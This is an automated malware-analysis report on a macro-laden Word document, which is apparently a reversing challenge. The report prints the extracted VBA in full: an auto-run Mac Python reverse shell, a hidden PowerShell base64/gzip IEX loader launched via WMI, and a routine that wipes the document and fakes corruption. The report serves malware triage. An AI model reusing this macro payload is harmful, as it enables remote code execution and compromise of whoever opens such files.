MALICIOUS
600
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains VBA macros that leverage `Shell()` and `CreateObject` to execute a PowerShell command. This command is designed to download a payload from the URL 'http://reversing.sg/fl4g.txt' and execute it. The use of WMI (`Win32_Process`) further indicates an attempt to launch a malicious process. The obfuscated nature of the PowerShell command and the embedded URL suggest a downloader functionality.
Heuristics 17
-
VBA macros detected medium 10 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Err.Clear scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""http://reversing.sg/fl4g.txt\"",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &""" res = MacScript(scriptToRun) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
lStr = "" lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAEWPYUvDMBCGvwv+h1EKS8DFoU5wozBsN+eQFZ1MaGehS88ZSRNIb12z0f9u0KEf733ufY7zj1kvawOfpK/QIJsorguhtu/DYV5xIdgD4BKNS0gaalWDQYemRpf3eQW3NyfWzWcvfR7p+ul6LotyZfmV3CV2cEjsXbSa6Dopm08392H2HHQppaPzM/+oWey1QfoYs0gY4KiNdXJ3MdwZAwr/UvK7vybjbEwv28A7ddcfMt8ybNBznCxg34s3X67SWdoKoWQLQPYGm1AKZ6Ms0nsldV5MhQTi/zx+0fnX0tE31FlVnA0BAAA=');$ms=New-Object System.IO.MemoryStream;$" lStr = lStr & "ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStr" -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Err.Clear scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""http://reversing.sg/fl4g.txt\"",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &""" res = MacScript(scriptToRun) -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") -
VBA injects an Excel-4 macro CALL to a download/exec API critical OLE_VBA_XLM_CALL_INJECTIONVBA writes Excel-4 (XLM) =CALL() formulas targeting urlmon URLDownloadToFile / Shell32 ShellExecute and runs them. This VBA-to-XLM bridge downloads and executes a payload while keeping the API names out of normal VBA keyword scanning.Matched line in script
Err.Clear scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""http://reversing.sg/fl4g.txt\"",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &""" res = MacScript(scriptToRun) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP") oXMLHTTP.Open "GET", sURL, False -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen" Sub Main() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() If InStr(1, Application.system.OperatingSystem, "Macintosh") <> 0 Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://enablemacroses.com Referenced by macro
- http://reversing.sg/fl4g.txt\Referenced by macro
- http://reversing.sg/fl4g.txtReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4995 bytes |
SHA-256: 7a19d07537b0ac2a30198242f5d4b4aa973671c968474b1d1f5068b0781c0732 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Mac Then
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As LongPtr
Private Declare PtrSafe Function web_popen Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function web_pclose Lib "libc.dylib" Alias "pclose" (ByVal file As LongPtr) As Long
Private Declare PtrSafe Function web_fread Lib "libc.dylib" Alias "fread" (ByVal outStr As String, ByVal size As LongPtr, ByVal items As LongPtr, ByVal stream As LongPtr) As Long
Private Declare PtrSafe Function web_feof Lib "libc.dylib" Alias "feof" (ByVal file As LongPtr) As LongPtr
#End If
Sub C64()
On Error Resume Next
Err.Clear
scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""http://reversing.sg/fl4g.txt\"",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &"""
res = MacScript(scriptToRun)
End Sub
Private Sub MainWin()
var_Filesize = FileLen(ActiveDocument.FullName)
Debug.Print var_Filesize
Const word = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = word
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
lStr = ""
lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAEWPYUvDMBCGvwv+h1EKS8DFoU5wozBsN+eQFZ1MaGehS88ZSRNIb12z0f9u0KEf733ufY7zj1kvawOfpK/QIJsorguhtu/DYV5xIdgD4BKNS0gaalWDQYemRpf3eQW3NyfWzWcvfR7p+ul6LotyZfmV3CV2cEjsXbSa6Dopm08392H2HHQppaPzM/+oWey1QfoYs0gY4KiNdXJ3MdwZAwr/UvK7vybjbEwv28A7ddcfMt8ybNBznCxg34s3X67SWdoKoWQLQPYGm1AKZ6Ms0nsldV5MhQTi/zx+0fnX0tE31FlVnA0BAAA=');$ms=New-Object System.IO.MemoryStream;$"
lStr = lStr & "ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStr"
lStr = lStr & "eam($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($"
lStr = lStr & "cs);$t=$sr.readtoend();IEX $t;"""
lStr = lStr & ""
objProcess.Create lStr, Null, objConfig, intProcessID
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.TypeText text:="File is really corrupted."
End Sub
Private Sub Document_Open()
If InStr(1, Application.system.OperatingSystem, "Macintosh") <> 0 Then
C64
Else
MainWin
End If
End Sub
Attribute VB_Name = "AutoOpen"
Sub Main()
UserForm1.Show
End Sub
Function ourseahorse(sMessage, strKey)
Dim kLen, x, y, i, j, temp
Dim s(256), k(256)
kLen = Len(strKey)
For i = 0 To 255
s(i) = i
k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
Next
j = 0
For i = 0 To 255
j = (j + k(i) + s(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
Next
x = 0
y = 0
For i = 1 To 3072
x = (x + 1) Mod 256
y = (y + s(x)) Mod 256
temp = s(x)
s(x) = s(y)
s(y) = temp
Next
For i = 1 To Len(sMessage)
x = (x + 1) Mod 256
y = (y + s(x)) Mod 256
temp = s(x)
s(x) = s(y)
s(y) = temp
ourseahorse = ourseahorse & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
Next
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F51098F9-75CB-492F-BD84-8E5DB98D052E}{4E126C8E-97D1-4BF2-8103-65C958C48100}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Dim oXMLHTTP As Object
Dim sPageHTML As String
Dim sURL As String
sURL = "http://enablemacroses.com"
Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
oXMLHTTP.Open "GET", sURL, False
oXMLHTTP.send
sKey = oXMLHTTP.responseText
sMessage = tbox.text
x = ourseahorse(sMessage, sKey)
y = "111,84,77,89,203,150,116,89,197,72,226,100,165,245,146,10,32,226,162,246,203,54,22,38,170,176,140,251,246,148,213,97,164,250,125,242,13,162,250,33,239,104,38,74,167,183,133,3,72,255,131,105,228,81,164,202,212,207,231,172,100,156,197,237,45,87,182,196,77,"
If x = y Then
MsgBox "Gratz"
Else
MsgBox "Try harder"
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.